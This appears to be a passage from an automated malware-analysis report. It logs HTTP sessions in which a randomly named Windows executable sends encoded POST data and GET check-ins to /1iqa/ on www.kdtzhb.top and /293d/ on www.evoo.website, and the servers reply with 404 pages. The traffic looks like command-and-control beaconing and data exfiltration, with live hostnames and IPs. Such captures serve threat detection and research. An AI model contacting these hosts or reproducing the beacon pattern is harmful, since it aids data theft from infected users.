                                                                        Nov 7, 2024 17:58:56.732330084 CET691INHTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Thu, 07 Nov 2024 16:58:56 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 548
                                                                        Connection: close
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        18192.168.2.74985947.242.89.146803872C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 7, 2024 17:58:58.330439091 CET657OUTPOST /1iqa/ HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 235
                                                                        Cache-Control: max-age=0
                                                                        Connection: close
                                                                        Host: www.kdtzhb.top
                                                                        Origin: http://www.kdtzhb.top
                                                                        Referer: http://www.kdtzhb.top/1iqa/
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                        Data Raw: 37 6a 3d 4a 4b 77 4a 39 41 53 68 76 53 65 41 47 5a 78 2f 75 49 58 55 6c 57 41 67 56 33 35 45 35 71 36 41 36 71 35 4c 77 6a 41 32 51 6b 49 4f 63 47 64 45 44 52 75 64 49 6c 6c 6d 58 6c 51 63 33 78 69 35 59 55 4e 72 79 6d 76 34 4f 4f 39 46 56 51 56 62 61 4a 6f 4d 73 33 32 2b 33 62 66 6b 68 32 53 34 34 61 46 67 39 73 4d 6a 59 75 62 78 4f 65 61 2f 58 35 52 70 37 72 33 30 43 33 57 32 53 70 4f 54 4b 56 39 2b 50 64 2f 6f 45 46 50 37 69 6f 5a 49 79 36 49 4d 76 50 59 4c 6e 68 55 72 33 36 54 74 57 4f 33 56 47 48 44 77 63 6c 32 74 6f 30 70 6f 7a 66 4e 76 4b 54 35 76 35 55 47 69 38 35 77 45 65 39 31 2b 38 41 69 48 37 4b 37 6f 45 46 35 46 4a 52 58 52 39 78 68 45 74 38 61 43 33 4c 76 57 33 43 72 4c 44 61 51 3d
                                                                        Data Ascii: 7j=JKwJ9AShvSeAGZx/uIXUlWAgV35E5q6A6q5LwjA2QkIOcGdEDRudIllmXlQc3xi5YUNrymv4OO9FVQVbaJoMs32+3bfkh2S44aFg9sMjYubxOea/X5Rp7r30C3W2SpOTKV9+Pd/oEFP7ioZIy6IMvPYLnhUr36TtWO3VGHDwcl2to0pozfNvKT5v5UGi85wEe91+8AiH7K7oEF5FJRXR9xhEt8aC3LvW3CrLDaQ=
                                                                        Nov 7, 2024 17:58:59.293710947 CET691INHTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Thu, 07 Nov 2024 16:58:59 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 548
                                                                        Connection: close
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        19192.168.2.74986047.242.89.146803872C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 7, 2024 17:59:00.878912926 CET1670OUTPOST /1iqa/ HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 1247
                                                                        Cache-Control: max-age=0
                                                                        Connection: close
                                                                        Host: www.kdtzhb.top
                                                                        Origin: http://www.kdtzhb.top
                                                                        Referer: http://www.kdtzhb.top/1iqa/
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                        Data Raw: 37 6a 3d 4a 4b 77 4a 39 41 53 68 76 53 65 41 47 5a 78 2f 75 49 58 55 6c 57 41 67 56 33 35 45 35 71 36 41 36 71 35 4c 77 6a 41 32 51 6b 41 4f 62 30 46 45 5a 7a 47 64 61 56 6c 6d 4c 56 51 5a 33 78 69 65 59 51 5a 76 79 6d 6a 43 4f 4e 46 46 56 79 4e 62 53 59 6f 4d 6d 33 32 2b 2b 37 66 70 73 57 53 58 34 61 31 6b 39 74 38 6a 59 75 62 78 4f 59 65 2f 51 71 4a 70 39 72 33 7a 4b 58 57 79 59 4a 50 30 4b 56 6c 75 50 63 76 34 44 31 76 37 69 4c 68 49 77 4a 67 4d 74 76 59 4a 72 42 55 7a 33 36 66 32 57 4f 72 5a 47 45 66 65 63 69 43 74 37 42 59 44 6f 4f 46 75 59 44 51 37 2b 46 32 6a 36 49 55 75 55 65 34 41 33 7a 57 66 35 4c 57 58 4e 6b 49 4a 47 45 75 63 6a 44 64 6e 68 4e 53 73 38 76 2b 6c 71 78 44 2b 55 66 39 66 4f 74 55 41 6b 31 41 2b 79 36 56 4f 4c 4f 76 2f 30 42 6b 71 65 33 73 35 65 36 33 4a 44 6a 2f 37 53 55 45 77 6f 74 58 49 54 72 6c 4c 4e 71 6d 64 74 50 34 52 4a 30 37 52 71 77 39 72 6e 48 30 63 59 73 32 4e 6b 4e 68 32 33 73 2b 64 5a 30 56 4a 75 51 69 4a 71 4f 6c 55 4e 72 38 64 47 68 42 51 54 61 70 35 4c 2f 41 [TRUNCATED]
                                                                        Data Ascii: 7j=JKwJ9AShvSeAGZx/uIXUlWAgV35E5q6A6q5LwjA2QkAOb0FEZzGdaVlmLVQZ3xieYQZvymjCONFFVyNbSYoMm32++7fpsWSX4a1k9t8jYubxOYe/QqJp9r3zKXWyYJP0KVluPcv4D1v7iLhIwJgMtvYJrBUz36f2WOrZGEfeciCt7BYDoOFuYDQ7+F2j6IUuUe4A3zWf5LWXNkIJGEucjDdnhNSs8v+lqxD+Uf9fOtUAk1A+y6VOLOv/0Bkqe3s5e63JDj/7SUEwotXITrlLNqmdtP4RJ07Rqw9rnH0cYs2NkNh23s+dZ0VJuQiJqOlUNr8dGhBQTap5L/AleWCYSCQkSLC2Snpofx3fO9lFuxclnF8FKgU7p8Q5+K7lwsp1UZ/XkAGOqHc+QBistn/lNoCoxDdRxV8kf+uR0UgsC30Kejn6xJBc6RkAwDhWS/vJhEmGC2N0h8K5MXwtvRZOyyvw8BWrU8Ar7WqQtkFp1A4wlNhQ+/Rk1uKPDkNyvmviBr1JoXu36lIgF4ErncQzSzXIyH+LVnkhtvFzDzdRpdqZ1iuUMSZze/Asy5q0tDz5y6iimIVOyptAOedAH/De6zRdaQ5T3p2xYaQ6c3Mki5juch5BPmXVEQk1bqK9DBJfGOn3IlQLTJPEt6JgE+b1eAN/OlLVDhsTElSxXZz8CnjZTBcPQssUodHEImFdx91ReQQEkboCxYMXFFPhJsjz/Vc5TNkRNXGn4WI4dILsARtPOYt4R4qFbxh3qPLI9hXX4ZqFDZCZKF1Ofx1fdxjUSdmyOoTZXNdWFJ0ZBK9QYrIihV+ZHLvIWqnzDvWPFFCU79RFliSJ6ew/t1NBZLuU9ArUpEpdFFxWsFLWCPphnWfP/Pqu4Vk9qJojX+B9mOMsiimZdRJPbpMGEAnrqKDTmQDZ1qDQc1kcicSzRfDc61Ef9g2xg3HSgVkFRrcIgKznayUZjXyzA8ikKjzhstFAD1VEAhA8+hPi3xLYtirapvk8HWc+z [TRUNCATED]
                                                                        Nov 7, 2024 17:59:01.803971052 CET691INHTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Thu, 07 Nov 2024 16:59:01 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 548
                                                                        Connection: close
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        20192.168.2.74986147.242.89.146803872C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 7, 2024 17:59:03.424273968 CET387OUTGET /1iqa/?7j=EIYp+2qno3OyA6JRko7EkEQRXSdht8qBodEq6zBYd0MwR3tzbR3TIlddc30TsymXBRZ2l1bBHfxTXhxkRZRQgVC25Yrin2Sqkv5Fwdk+dvafD+ucZYRStKeuK1fTd52HaDhfGqTyDFD4&UvgPX=o0HdzhbpI6gx HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Connection: close
                                                                        Host: www.kdtzhb.top
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                        Nov 7, 2024 17:59:04.377646923 CET691INHTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Thu, 07 Nov 2024 16:59:04 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 548
                                                                        Connection: close
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        21192.168.2.749862128.65.195.180803872C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 7, 2024 17:59:09.648832083 CET643OUTPOST /293d/ HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 215
                                                                        Cache-Control: max-age=0
                                                                        Connection: close
                                                                        Host: www.evoo.website
                                                                        Origin: http://www.evoo.website
                                                                        Referer: http://www.evoo.website/293d/
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                        Data Raw: 37 6a 3d 32 5a 6d 7a 6b 4d 49 4e 54 59 61 61 4b 2b 4a 34 44 4b 44 4f 32 6b 4c 74 36 69 39 51 65 73 64 78 33 45 4b 49 52 46 62 41 4d 32 79 42 77 61 4e 6f 6c 42 39 4e 46 41 59 78 6f 37 6e 57 38 38 35 76 59 43 69 66 50 35 73 59 4c 7a 50 34 48 51 37 30 4d 76 7a 44 57 4b 59 33 31 72 44 76 55 78 71 4e 62 4b 63 4e 53 69 70 6f 44 64 65 4a 6c 45 5a 71 6f 51 75 51 6d 6c 54 46 70 73 49 63 6c 69 49 65 30 42 4d 41 37 75 67 79 45 67 45 44 34 74 64 4d 70 67 42 48 66 51 61 46 6e 4d 50 69 49 69 38 34 32 63 63 2f 4d 45 7a 4e 30 37 33 78 62 2b 67 2f 49 43 56 73 44 55 53 66 6e 46 44 47 67 6e 49 2f 57 55 35 65 34 69 58 4d 62 4e 70 43 75 4e 6e 79 6a 51 3d 3d
                                                                        Data Ascii: 7j=2ZmzkMINTYaaK+J4DKDO2kLt6i9Qesdx3EKIRFbAM2yBwaNolB9NFAYxo7nW885vYCifP5sYLzP4HQ70MvzDWKY31rDvUxqNbKcNSipoDdeJlEZqoQuQmlTFpsIcliIe0BMA7ugyEgED4tdMpgBHfQaFnMPiIi842cc/MEzN073xb+g/ICVsDUSfnFDGgnI/WU5e4iXMbNpCuNnyjQ==


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        22192.168.2.749863128.65.195.180803872C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 7, 2024 17:59:12.195035934 CET663OUTPOST /293d/ HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 235
                                                                        Cache-Control: max-age=0
                                                                        Connection: close
                                                                        Host: www.evoo.website
                                                                        Origin: http://www.evoo.website
                                                                        Referer: http://www.evoo.website/293d/
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                        Data Raw: 37 6a 3d 32 5a 6d 7a 6b 4d 49 4e 54 59 61 61 46 2b 35 34 41 74 58 4f 2b 6b 4c 71 35 69 39 51 46 63 64 31 33 45 4f 49 52 42 4c 51 50 43 65 42 33 2f 78 6f 33 51 39 4e 45 41 59 78 6a 62 6e 58 7a 63 35 77 59 43 75 58 50 38 4d 59 4c 7a 4c 34 48 56 2f 30 4d 2f 4f 78 58 61 59 31 2b 4c 44 58 4a 68 71 4e 62 4b 63 4e 53 6a 4d 44 44 5a 79 4a 6c 30 70 71 70 30 79 50 72 46 54 61 2f 38 49 63 76 43 49 61 30 42 4e 56 37 73 55 4c 45 69 4d 44 34 73 74 4d 71 31 68 41 52 51 61 44 6a 4d 4f 31 4f 54 42 32 75 76 4d 41 55 57 44 2b 30 4a 53 52 65 49 68 64 53 67 5a 41 64 46 71 6b 6a 48 6e 77 33 42 56 4b 55 56 39 47 31 41 6a 74 45 36 4d 6f 6a 66 47 32 31 75 6b 62 43 4c 67 71 43 6a 44 4c 33 51 39 49 2f 67 64 43 71 64 41 3d
                                                                        Data Ascii: 7j=2ZmzkMINTYaaF+54AtXO+kLq5i9QFcd13EOIRBLQPCeB3/xo3Q9NEAYxjbnXzc5wYCuXP8MYLzL4HV/0M/OxXaY1+LDXJhqNbKcNSjMDDZyJl0pqp0yPrFTa/8IcvCIa0BNV7sULEiMD4stMq1hARQaDjMO1OTB2uvMAUWD+0JSReIhdSgZAdFqkjHnw3BVKUV9G1AjtE6MojfG21ukbCLgqCjDL3Q9I/gdCqdA=


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        23192.168.2.749864128.65.195.180803872C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 7, 2024 17:59:14.736999989 CET1676OUTPOST /293d/ HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 1247
                                                                        Cache-Control: max-age=0
                                                                        Connection: close
                                                                        Host: www.evoo.website
                                                                        Origin: http://www.evoo.website
                                                                        Referer: http://www.evoo.website/293d/
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                        Data Raw: 37 6a 3d 32 5a 6d 7a 6b 4d 49 4e 54 59 61 61 46 2b 35 34 41 74 58 4f 2b 6b 4c 71 35 69 39 51 46 63 64 31 33 45 4f 49 52 42 4c 51 50 43 57 42 33 4e 4a 6f 6c 6a 6c 4e 44 41 59 78 71 37 6e 53 7a 63 34 73 59 42 65 70 50 38 4a 76 4c 78 44 34 56 48 33 30 64 38 57 78 4f 71 59 31 6a 62 44 73 55 78 71 59 62 4a 6b 42 53 69 38 44 44 5a 79 4a 6c 33 78 71 67 41 75 50 34 31 54 46 70 73 49 59 6c 69 49 79 30 46 6f 75 37 73 51 62 45 7a 73 44 34 50 46 4d 72 42 42 41 5a 51 61 42 6d 4d 4f 39 4f 54 4e 39 75 76 67 6d 55 54 58 48 30 4a 71 52 66 35 63 36 47 6a 42 67 48 58 36 36 71 6c 33 68 35 67 45 37 61 6e 68 46 72 33 62 56 42 49 77 71 6e 38 32 61 7a 65 35 69 41 4c 52 65 4f 77 7a 4e 32 30 59 77 67 53 42 5a 2f 4e 71 2f 35 69 66 4e 49 46 43 6a 42 4b 6d 53 6c 44 78 72 50 4b 6b 79 76 4a 4c 43 4b 36 32 63 62 4d 48 73 6e 37 54 6f 32 6e 54 50 73 77 4e 70 43 4f 79 7a 36 6e 45 79 36 63 4f 6f 66 74 69 32 58 33 50 58 41 57 6c 50 72 6c 51 57 52 38 75 5a 79 6e 42 62 2b 58 50 73 7a 50 70 31 4e 4c 4c 6e 54 37 6b 77 43 78 6e 4d 37 52 43 [TRUNCATED]
                                                                        Data Ascii: 7j=2ZmzkMINTYaaF+54AtXO+kLq5i9QFcd13EOIRBLQPCWB3NJoljlNDAYxq7nSzc4sYBepP8JvLxD4VH30d8WxOqY1jbDsUxqYbJkBSi8DDZyJl3xqgAuP41TFpsIYliIy0Fou7sQbEzsD4PFMrBBAZQaBmMO9OTN9uvgmUTXH0JqRf5c6GjBgHX66ql3h5gE7anhFr3bVBIwqn82aze5iALReOwzN20YwgSBZ/Nq/5ifNIFCjBKmSlDxrPKkyvJLCK62cbMHsn7To2nTPswNpCOyz6nEy6cOofti2X3PXAWlPrlQWR8uZynBb+XPszPp1NLLnT7kwCxnM7RC4Ng/pF9q70W4c1bxTRIAYO90zyx3DSDy9vzAPi4MkTmoTdSPL8DtkXpQ0iwf+goSXIn4z5/RkrPuUzbo93EneNyO70ze7uThX5TEnvXBi+gFnEkC3cfvPDXpJXjlCpBlE8VATrMJ8S16dB3cunaD4nY1rWh6gJzNwluqFzZiBDSxZVfPtLIdD7DsM/u5RUblER0CmVWrq9ZYQ+RWS+mAySHVRC/TdX0L4MQqmjpznMjoN3/8IYqpnC/6AqaGb7z2N/AEs6kk7pzxb7EVHpBIg8Cbmk5Q79hBTGTq96S2WyTQ2VcLIcCsUhu+6vRwKFGCgSuxveXNWHHMoUwKw5NZRkEDa4dtbPluEAPpx+uCq03krtswr56V5iP5Qvp1D0MOk7fHmoox+IyfwCtVWSh8lYCrlMGBGCfD5wNsvzfnZ4WiDc3UiR6qq5AkGyyIbYWByx7j3FeCFemhv5PC/3uQZoX0Rajcyf7LoPEoALwypfGPRScJkOk85+7rKRwGgqojVRdke1ZJoyryUpUYX1c4s37Eh582uwC6vqn8UXNwm/4IiYgMiwtDm0Rrl2EyhEx4rr1bLA7OVnMEcnO5CztrJAwS4hlUdxguJOLUpPycTj1dPW2GXJUHtL1th0Nu7Go9O7mHhZyttcirf6/x2rvWfiqGn2ZyfesH8Q [TRUNCATED]


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        24192.168.2.749865128.65.195.180803872C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 7, 2024 17:59:17.387095928 CET389OUTGET /293d/?7j=7bOTn4s4CK+jD9JxCOvk7GPe7C1JF/pOmj70YCSuK3OR6e0KuyF5TSw/saz3rP1zPyqrHIRHHBHNYmPna8SGQY4I1bDlFW6+Qsk+eyldD4LupDRErgy15HSDrpN9gAoL/hEh+9gUTgMo&UvgPX=o0HdzhbpI6gx HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Connection: close
                                                                        Host: www.evoo.website
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                        Nov 7, 2024 17:59:19.906847000 CET458INHTTP/1.1 404 Not Found
                                                                        Date: Thu, 07 Nov 2024 16:59:19 GMT
                                                                        Server: Apache/2.4.25 (Debian)
                                                                        Content-Length: 278
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 35 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 65 76 6f 6f 2e 77 65 62 73 69 74 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.25 (Debian) Server at www.evoo.website Port 80</address></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
